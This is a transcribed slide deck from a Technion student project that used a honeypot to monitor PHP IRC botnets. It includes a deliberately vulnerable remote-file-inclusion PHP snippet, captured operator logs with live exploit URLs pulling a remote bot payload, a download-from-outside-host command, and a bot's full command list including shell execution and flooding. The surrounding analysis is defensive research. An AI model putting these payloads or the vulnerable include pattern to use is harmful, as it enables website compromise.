1 / 22

Monitoring botnets from within

Technion - Israel Institute of Technology COMPUTER SCIENCE DEPARTMENT Project  in  Computer Security (236349). Monitoring botnets from within. Students: Yevgeni Sabin, Alexander Chigirintsev Supervisor: Amichai Shulman. Background.

hall
Download Presentation

Monitoring botnets from within

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Technion - Israel Institute of Technology COMPUTER SCIENCE DEPARTMENT Project in Computer Security (236349) Monitoring botnets from within Students: Yevgeni Sabin, Alexander Chigirintsev Supervisor: AmichaiShulman

  2. Background Botnet – a group of computers infected by malicious code, connected to the Internet and controlled by attacker via command and control center (IRC server). In our case infected machines are web servers.

  3. Background RFI – remote file inclusion is a type of attack in which “dynamic file include” mechanism is exploited. Attacker includes malicious code, and takes control over the server. $url=$_SERVER['REQUEST_URI'];$file = parse_url($url, PHP_URL_QUERY);include $file

  4. Methodology Setup: • Virtual Machine (VMware) on home PC: • OS: Windows XP SP3 • Apache HTTP server + PHP 5.3 • Mail Server • Simple vulnerable site • Wireshark

  5. Methodology • Links to malicious code were received from supervisor or found on the Internet. Each link were remotely included in our fake site. • All network communication were recorded by network analyzer and analyzed later.

  6. Infection process IRC Find a victim

  7. IRC Command and Control Server

  8. Finding vulnerable servers :D3V_CO!Cok@Asli.Cah.Muneng.Gumukmas.Jember PRIVMSG #b0yz :!rfi /index.php?DOCUMEN_ROOT= "netcat_files“

  9. Finding vulnerable servers :D3V_CO!Cok@Asli.Cah.Muneng.Gumukmas.Jember PRIVMSG #b0yz :!rfi /index.php?DOCUMEN_ROOT= "netcat_files“ :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9] .[AsK] 403 :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9] .[SaPo] 1055 :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9] .[oNeT] 52 :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9] .[YahOo] 1222 :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9](.4@.9VuLn.15).10 http://www.bsau.ru//index.php?DOCUMEN_ROOT=http://tj9.fileave.com/bot.txt?? (.4@.7safemode-on.15). :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9](.4@.9VuLn.15).10 http://vestnik.bsau.ru//index.php?DOCUMEN_ROOT=http://tj9.fileave.com/bot.txt?? (.4@.7safemode-on.15). :b0yz9!b0yz@oYikNet-33040E0B.apuyen.info PRIVMSG #b0yz :.9,1[.15rfi.9](.4@.9VuLn.15).10 http://www.bowling.ru/netcat_files/319/189/h_47768a1cadfac385d61ce9db4ec06c51//index.php?DOCUMEN_ROOT=http://tj9.fileave.com/bot.txt?? (.4@.7safemode-on.15).

  10. What infected machine can do? * COMMANDS:** .user <password> //login to the bot* .logout //logout of the bot* .die //kill the bot* .restart //restart the bot* .mail <to> <from> <subject> <msg> //send an email* .dns <IP|HOST> //dns lookup* .download <URL> <filename> //download a file* .exec <cmd> // uses exec() //execute a command* .sexec <cmd> // uses shell_exec() //execute a command* .cmd <cmd> // uses popen() //execute a command* .info //get system information* .php <php code> // uses eval() //execute php code* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack* .raw <cmd> //raw IRC command* .rndnick //change nickname* .pscan <host> <port> //port scan* .safe // test safe_mode (dvl)* .inbox <to> // test inbox (dvl)* .conback <ip> <port> // conect back (dvl)* .uname // return shell's uname using a php function (dvl) */ • Sending spam • DDoS attack • Test for vulnerabilities • Download and execude

  11. Getting direct access to the server :b0yz_JbX!b0yz@C.r.e.w MODE #preman +v [A]b0yz848 :b0yz_JbX!b0yz@C.r.e.w PRIVMSG #preman :.user setan PRIVMSG #preman :[.Auth.]: OK b0yz_JbX You Are Ready... My OwnER !!!!!!!!!!!!!!!!!!!! :b0yz_JbX!b0yz@C.r.e.w PRIVMSG #preman :.info PRIVMSG #preman :[.info.]: Windows NT MYSEREVE-E176B7 5.1 build 2600 (Windows XP Professional Service Pack 3) i586 (safe: off) PRIVMSG #preman :[.vuln.]: http://buyskie.co.il/redirecter.php?http://95.154.24.14:32000//accounts/inc/admin/apache.jpg :b0yz_JbX!b0yz@C.r.e.w PRIVMSG #preman :.download http://95.154.24.14:32000//accounts/inc/admin/ipays.jpg mail.php PRIVMSG #preman :[.download.]: Arquivo .http://95.154.24.14:32000//accounts/inc/admin/ipays.jpg. baixadopara .mail.php. Example: http://buyskie.sytes.net/back.php

  12. Botnet example • Botnet #rafflesia (by room name) • Monitoring time: 5 days • number of bots: ~150 • Joins per day: ~60 • Leaves per day: ~70 • Number of bots on same system: ~3 • Maximal bots on same system: 37 ( hetzner.de – VDS provider )

  13. Botnet example ~150 participants scanners

  14. Botnet example • Botnet #rafflesia (by room name) • Number of scanners: 6 • Can look for ~15 vulnerabilities: • RFI, LFI, SQL injection, Word Press • osCommerce, Zen Cart® Ecommerce ,e107 and more

  15. Botnet example • Botnet #rafflesia (by room name) • Number of scanners: 6 • Can look for ~15 vulnerabilities: • RFI, LFI, SQL injection, Word Press • osCommerce, Zen Cart® Ecommerce ,e107 and more • Search engines in use: 32 • GooGLe, ReDiff, Bing, ALtaViSTa, AsK, UoL, CluSty, GutSer, ExaLead, VirgiLio, WebDe, AoL, SaPo, DuCk, YauSe, BaiDu, KiPoT, GiBLa, YahOo, HotBot, LyCos, LyGo, BLacK, oNeT, SiZuka, WaLLa, DeMos, RoSe, SeZnaM, TisCali, NaVeR

  16. Botnet example • Botnet #rafflesia (by room name) • Number of scanners: 6 • Can look for ~15 vulnerabilities: • RFI, LFI, SQL injection, Word Press • osCommerce, Zen Cart® Ecommerce ,e107 and more • Search engines in use: 32 • GooGLe, ReDiff, Bing, ALtaViSTa, AsK, UoL, CluSty, GutSer, ExaLead, VirgiLio, WebDe, AoL, SaPo, DuCk, YauSe, BaiDu, KiPoT, GiBLa, YahOo, HotBot, LyCos, LyGo, BLacK, oNeT, SiZuka, WaLLa, DeMos, RoSe, SeZnaM, TisCali, NaVeR • Scans per day: 48 • Looked for vulnerabilities: Word Press (88%), RFI (12%) • Vulnerable sites found per day: ~155

  17. Botnet example • Botnet #rafflesia (by room name) Vulnerable sites found per day: ~155

  18. Compromised site example

  19. Compromised site example

  20. Compromised site example

  21. Conclusions • Main usage of PHP botnets is searching and infecting vulnerable sites. PHP botnet gives good ready-to-use infrastructure for this purpose. • Almost no “traditional” activity of botnets were observed. Traditional attacks as DDoS is hard to make due to low number of participants. • Low variety of bots used (manly “pBot”). Most of their functionality is not used. • Known (old) vulnerabilities used to infect the systems – only sites that are not maintained well can be infected.

  22. Further steps • Improve the honey pot – more realistic site, that holds interesting information for attacker. Small online store is very attractive for hackers. • Try to infect the system in the normal way the botnets do - thru the scanners (get to Google search results). • More observation time (few weeks)

More Related